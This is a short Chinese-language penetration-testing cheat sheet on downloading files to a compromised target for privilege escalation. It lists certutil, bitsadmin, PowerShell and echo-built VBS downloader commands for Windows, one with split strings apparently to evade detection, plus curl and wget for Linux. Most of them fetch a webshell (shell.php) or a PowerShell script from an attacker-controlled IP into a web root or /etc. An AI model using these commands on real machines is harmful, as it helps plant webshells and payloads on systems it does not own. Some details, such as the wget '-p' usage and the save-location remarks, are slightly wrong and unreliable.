文件下载

前言

对于渗透测试来说，当我们拿到的目标权限过低，会很难进行下一步动作，便需要使用其他利器继续进行提权等操作，当需要将文件下载到目标机器时，就会用到文件下载命令。

Windows

0x00 certutil

certutil.exe是一个命令行工具，作为Windows server 2003家族证书服务的一部分安装。

命令详解

certutil -urlcache -split -f http://192.168.72.10/shell.php

将shell.php下载当当前目录

该命令适用于 server 2003以上版本

0x01 bitsadmin

BITSAdmin是一个命令行工具，可用于创建下载或上传作业并监视其进度。

命令详解

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.72.10/shell.php" "E:\phpstudy_pro\WWW\shell.php"

将shell.php下载到E:\phpstudy_pro\WWW\目录

该命令适用于win 7以上版本

0x02 powersehll

命令详解

powershell(new-object Net.WebClient).DownloadFile('http://192.168.72.10/shell.php','E:\phpstudy_pro\WWW\shell.php')

将shell.php脚本下载到当前目录

该命令适用于server 2003以上版本

0x03 vbs

• 第一种

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.203.140/a.ps1",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.ps1",2 >>download.vbs

把下载地址直接echo输入download.vbs。直接下载即可

该命令适用于server 2003以上版本

• 第二种

# echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs
# cscript downfile.vbs http://192.168.203.140/a.ps1 D:\\tomcat8.5\\webapps\\x.ps1

保存脚本后再下载指定文件

该命令适用于server 2003以上版本

Linux

0x00 curl

基本用法

# curl http://www.linux.com

执行后，www.linux.com 的html就会显示在屏幕上了

保存访问的网页

# curl http://www.linux.com >> linux.html

# curl -o linux.html http://www.linux.com

0x01 wget

# wget -p /etc http://192.168.72.10/shell.php

下载文件到 /etc 文件夹下